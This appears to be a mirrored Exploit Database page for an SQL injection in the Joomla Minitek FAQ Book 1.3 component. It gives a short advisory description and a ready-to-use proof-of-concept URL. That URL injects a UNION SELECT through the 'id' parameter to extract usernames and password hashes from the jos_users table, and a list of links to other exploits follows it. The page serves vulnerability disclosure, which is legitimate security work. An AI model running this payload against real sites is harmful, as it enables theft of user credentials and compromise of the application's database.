Joomla! Component Minitek FAQ Book 1.3 – ‘id’ SQL Injection

Exploit Database
19 阅读

作者： kaMtiEz

日期： 2011-06-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35839/

source: https://www.securityfocus.com/bid/48223/info

Joomla Minitek FAQ Book is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--

last Exploits
Joomla! Component Minitek FAQ Book 1.3 – ‘id’ SQL Injection的更多信息

Boom CMS v8.0.7 – Cross Site Scripting：
Visitor Management System in PHP 1.0 – Persistent Cross-Site Scripting：
WordPress Plugin Video Gallery 2.7.0 – SQL Injection：
Hostel Management System 2.0 – ‘id’ SQL Injection (Unauthenticated)：
MyBB OUGC Awards Plugin 1.8.3 – Persistent Cross-Site Scripting：
NodeBB Plugin Emoji 3.2.1 – Arbitrary File Write：
Inteno DG301 – Command Injection：
OpenEMR 5.0.1.3 – Authentication Bypass：